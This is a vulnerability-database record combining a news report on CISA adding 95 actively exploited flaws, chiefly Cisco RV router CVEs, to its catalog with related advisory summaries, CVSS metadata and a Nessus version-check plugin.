The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added 95 more security flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), taking the total number of actively exploited vulnerabilities to 478.
"These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise," the agency [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/03/cisa-adds-95-known-exploited-vulnerabilities-catalog>) in an advisory published on March 3, 2022.
Of the 95 newly added bugs, 38 relate to Cisco, 27 to Microsoft, 16 to Adobe, and seven to Oracle, with one each in Apache Tomcat, ChakraCore, Exim, Mozilla Firefox, Linux Kernel, Siemens SIMATIC CP, and the Treck TCP/IP stack.
Included in the list are five issues discovered in Cisco RV routers, which CISA notes are being exploited in real-world attacks. The flaws, which [came to light](<https://thehackernews.com/2022/02/critical-flaws-discovered-in-cisco.html>) early last month, allow for the execution of arbitrary code with root privileges.
Three of the vulnerabilities – CVE-2022-20699, CVE-2022-20700, and CVE-2022-20708 – are rated 10 out of 10 on the CVSS rating scale, enabling an attacker to inject malicious commands, elevate privileges to root, and run arbitrary code on vulnerable systems.
CVE-2022-20701 (CVSS score: 9.0) and CVE-2022-20703 (CVSS score: 9.3) are no different in that they could allow an adversary to "execute arbitrary code, elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service," CISA added.
Cisco, for its part, previously acknowledged that it's "aware that proof-of-concept exploit code is available for several of the vulnerabilities." Further details about the nature of the attacks or the threat actors that may be weaponizing them are unknown as yet.
To reduce the significant risk of the vulnerabilities and prevent them from being used as a vector for potential cyber-attacks, federal agencies in the U.S. are mandated to apply the patches by March 17, 2022.
The development comes shortly after Cisco released patches for [critical security vulnerabilities](<https://thehackernews.com/2022/03/critical-patches-issued-for-cisco.html>) affecting Expressway Series and Cisco TelePresence Video Communication Server (VCS) earlier in the week that could be exploited by a malicious party to gain elevated privileges and execute arbitrary code.
{"id": "THN:BFD431BCD0AED94215283E172C006DEB", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "CISA Adds Another 95 Flaws to its Actively Exploited Vulnerabilities Catalog", "published": "2022-03-05T07:32:00", "modified": "2022-03-07T03:28:08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2022/03/cisa-adds-another-95-flaws-to-its.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20703", "CVE-2022-20708"], "immutableFields": [], "lastseen": "2022-05-09T12:37:29", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0108"]}, {"type": "cisco", 
"idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D"]}, {"type": "cve", "idList": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20703", "CVE-2022-20708"]}, {"type": "githubexploit", "idList": ["26AFA65D-4E78-506D-A1E9-336FBDA926A1", "2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C", "A97B12FD-207B-59C7-9E79-80106F63D735"]}, {"type": "nessus", "idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167113"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA"]}, {"type": "thn", "idList": ["THN:DFFEC77385F3B4F85C43CE529B98C152"]}, {"type": "threatpost", "idList": ["THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6"]}, {"type": "zdi", "idList": ["ZDI-22-408", "ZDI-22-412", "ZDI-22-413", "ZDI-22-414", "ZDI-22-417"]}, {"type": "zdt", "idList": ["1337DAY-ID-37729"]}]}, "score": {"value": 1.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F"]}, {"type": "githubexploit", "idList": ["2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C"]}, {"type": "nessus", "idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL"]}]}, "epss": [{"cve": "CVE-2022-20699", "epss": "0.945170000", "percentile": "0.987100000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20700", "epss": "0.004420000", "percentile": "0.708850000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20701", "epss": "0.000730000", "percentile": "0.296870000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20703", "epss": "0.000920000", "percentile": "0.378170000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20708", "epss": "0.005090000", "percentile": "0.729360000", "modified": "2023-03-18"}], "vulnersScore": 1.9}, "_state": {"dependencies": 1659988328, "score": 1659965167, "epss": 1679179052}, "_internal": {"score_hash": 
"7be441a56566fa8b96e8a93b1520449d"}}
{"nessus": [{"lastseen": "2023-02-17T14:52:39", "description": "According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple vulnerabilities:\n\n - A vulnerability in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. (CVE-2022-20699)\n\n - Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV Series Routers could allow a remote attacker to elevate privileges to root. (CVE-2022-20700, CVE-2022-20701, CVE-2022-20702)\n\n - A vulnerability in the software image verification feature of Cisco Small Business RV Series Routers could allow an unauthenticated, local attacker to install and boot a malicious software image or execute unsigned binaries on an affected device. (CVE-2022-20703)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "nessus", "title": "Cisco Small Business RV Series Routers Multiple Vulnerabilities (cisco-sa-smb-mult-vuln-KA9PK6D)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-12-05T00:00:00", "cpe": ["x-cpe:/o:cisco:small_business_rv_series_router_firmware", "cpe:/h:cisco:rv340", "cpe:/h:cisco:rv340w", "cpe:/h:cisco:rv345", "cpe:/h:cisco:rv345p", "cpe:/h:cisco:rv160", "cpe:/h:cisco:rv160w", "cpe:/h:cisco:rv260", "cpe:/h:cisco:rv260p", "cpe:/h:cisco:rv260w"], "id": "CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL", "href": "https://www.tenable.com/plugins/nessus/157361", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157361);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-20699\",\n \"CVE-2022-20700\",\n \"CVE-2022-20701\",\n \"CVE-2022-20702\",\n \"CVE-2022-20703\",\n \"CVE-2022-20704\",\n \"CVE-2022-20705\",\n \"CVE-2022-20706\",\n \"CVE-2022-20707\",\n \"CVE-2022-20708\",\n \"CVE-2022-20709\",\n \"CVE-2022-20710\",\n \"CVE-2022-20711\",\n \"CVE-2022-20712\",\n \"CVE-2022-20749\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvz88279\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvz94704\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa12732\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa12748\");\n script_xref(name:\"CISCO-BUG-ID\", 
value:\"CSCwa12836\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13115\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13119\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13205\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13682\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13836\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13882\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13888\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13900\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14007\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14008\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14564\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14565\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14601\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14602\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa15167\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa15168\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa18769\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa18770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa32432\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa36774\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa54598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-smb-mult-vuln-KA9PK6D\");\n script_xref(name:\"IAVA\", value:\"2022-A-0058\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0004\");\n\n script_name(english:\"Cisco Small Business RV Series Routers Multiple Vulnerabilities (cisco-sa-smb-mult-vuln-KA9PK6D)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple\nvulnerabilities:\n\n - A 
vulnerability in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN\n Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected\n device. (CVE-2022-20699)\n\n - Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV Series Routers could\n allow a remote attacker to elevate privileges to root. (CVE-2022-20700, CVE-2022-20701, CVE-2022-20702)\n\n - A vulnerability in the software image verification feature of Cisco Small Business RV Series Routers could allow\n an unauthenticated, local attacker to install and boot a malicious software image or execute unsigned binaries\n on an affected device. (CVE-2022-20703)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d880707f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvz88279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvz94704\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12732\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13119\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13888\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14008\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14564\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14565\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa15167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa15168\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa18769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa18770\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa32432\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa36774\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvz88279, CSCvz94704, CSCwa12732, CSCwa12748,\nCSCwa12836, CSCwa13115, CSCwa13119, CSCwa13205, CSCwa13682, CSCwa13836, CSCwa13882, CSCwa13888, CSCwa13900, CSCwa14007,\nCSCwa14008, CSCwa14564, CSCwa14565, CSCwa14601, CSCwa14602, CSCwa15167, CSCwa15168, CSCwa18769, CSCwa18770, CSCwa32432,\nCSCwa36774, CSCwa54598\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-20749\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(77, 121, 269, 285, 295, 347, 362, 434, 552, 754, 785);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:small_business_rv_series_router_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340w\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345p\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv160\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv160w\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260p\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260w\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_small_business_detect.nasl\", \"cisco_rv_webui_detect.nbin\");\n script_require_keys(\"Cisco/Small_Business_Router/Version\", \"Cisco/Small_Business_Router/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Small Business Series Router Firmware');\n\nvar vuln_ranges;\nif (product_info['model'] =~ \"^RV(1|2)60\")\n vuln_ranges = [{ 'min_ver' : '0', 'fix_ver' : '1.0.01.07' }];\nelse if (product_info['model'] =~ \"^RV34(0|5)\")\n vuln_ranges = [{ 'min_ver' : '1.0.03.24', 'fix_ver' : '1.0.03.26' }];\nelse\n audit(AUDIT_HOST_NOT, 'an affected Cisco Small Business RV Series router');\n\nvar reporting = make_array(\n 'port' , product_info['port'],\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvz88279, CSCvz94704, CSCwa12732, CSCwa12748, CSCwa12836, CSCwa13115, CSCwa13119, CSCwa13205, CSCwa13682, CSCwa13836, CSCwa13882, CSCwa13888, CSCwa13900, CSCwa14007, CSCwa14008, CSCwa14564, CSCwa14565, CSCwa14601, CSCwa14602, CSCwa15167, CSCwa15168, CSCwa18769, CSCwa18770, CSCwa32432, 
CSCwa36774, CSCwa54598',\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-12-17T06:19:29", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following:\n\nExecute arbitrary code\nElevate privileges\nExecute arbitrary commands\nBypass authentication and authorization protections\nFetch and run unsigned software\nCause denial of service (DoS)\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D\"]", "cvss3": {}, "published": "2022-02-02T16:00:00", "type": "cisco", "title": "Cisco Small Business RV Series Routers Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-14T13:54:42", "id": "CISCO-SA-SMB-MULT-VULN-KA9PK6D", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D", "cvss": {"score": 10.0, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}}], "thn": [{"lastseen": "2022-05-09T12:37:36", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEggUIor3NC8qvtjyt9YASYnMWPLxsl-P_PHtEouUnnH9RiFuzkhlnkJ1dpl4e67-BdzivejJXKOU9MGxP3Y3qdZ0xdVXtF2yBDx8DrmNFYvRmf5Sx-sIz8z7otN4A3_fuvztKwazYqYZQxxw4w59trQU7FOJFIoszwPGltAhPzBbadPhcQJAsv3ia9V>)\n\nCisco has patched multiple critical [security vulnerabilities](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D>) impacting its RV Series routers that could be weaponized to elevate privileges and execute arbitrary code on affected systems, while also warning of the existence of proof-of-concept (PoC) exploit code targeting some of these bugs.\n\nThree of the 15 flaws, tracked as CVE-2022-20699, CVE-2022-20700, and CVE-2022-20707, carry the highest CVSS rating of 10.0, and affect its Small Business RV160, RV260, RV340, and RV345 Series routers.\n\nAdditionally, the flaws could be exploited to bypass authentication and authorization protections, retrieve and run unsigned software, and even cause denial-of-service (DoS) conditions.\n\nThe networking equipment maker acknowledged that it's \"aware that proof-of-concept exploit code is available for several of the vulnerabilities\" but didn't share any further specifics on the nature of the exploit or the identity of the threat actors that may be exploiting them.\n\nCVE-2022-20699 concerns a case of remote code execution that could be exploited by an attacker by sending specially crafted HTTP requests to a device that functions as an SSL VPN Gateway, effectively leading to the execution of malicious code with root privileges.\n\nCVE-2022-20700, CVE-2022-20701 (CVSS score: 9.0), and CVE-2022-20702 (CVSS score: 6.0), which the company said stems from an insufficient authorization enforcement mechanism, could be abused to elevate privileges to root and execute arbitrary commands on the affected system.\n\nCVE-2022-20708, the third flaw to receive a 10.0 score on the CVSS scale, is due to insufficient validation of user-supplied 
input, enabling the adversary to inject malicious commands and get them on the underlying Linux operating system.\n\nOther flaws fixed by Cisco are as follows:\n\n * **CVE-2022-20703** (CVSS score: 9.3) \u2013 Cisco Small Business RV Series Routers Digital Signature Verification Bypass Vulnerability\n * **CVE-2022-20704** (CVSS score: 4.8) \u2013 Cisco Small Business RV Series Routers SSL Certificate Validation Vulnerability\n * **CVE-2022-20705** (CVSS score: 5.3) \u2013 Cisco Small Business RV Series Routers Improper Session Management Vulnerability\n * **CVE-2022-20706** (CVSS score: 8.3) \u2013 Cisco RV Series Routers Open Plug and Play Command Injection Vulnerability\n * **CVE-2022-20707 and CVE-2022-20749** (CVSS scores: 7.3) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Command Injection Vulnerabilities\n * **CVE-2022-20709** (CVSS score: 5.3) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Upload Vulnerability\n * **CVE-2022-20710** (CVSS score: 5.3) \u2013 Cisco Small Business RV Series Routers GUI Denial of Service Vulnerability\n * **CVE-2022-20711** (CVSS score: 8.2) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Overwrite Vulnerability\n * **CVE-2022-20712** (CVSS score: 7.3) \u2013 Cisco Small Business RV Series Routers Upload Module Remote Code Execution Vulnerability\n\nCisco also stressed that there are no workarounds that address these aforementioned weaknesses, urging customers to update to the latest version of the software as soon as possible to counter any potential attacks.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T14:05:00", "type": "thn", "title": "Critical Flaws Discovered in Cisco Small Business RV Series Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-04T05:00:43", "id": "THN:DFFEC77385F3B4F85C43CE529B98C152", "href": "https://thehackernews.com/2022/02/critical-flaws-discovered-in-cisco.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-02-23T18:44:15", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations 
of Cisco RV340 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the update-clients method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 update-clients Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 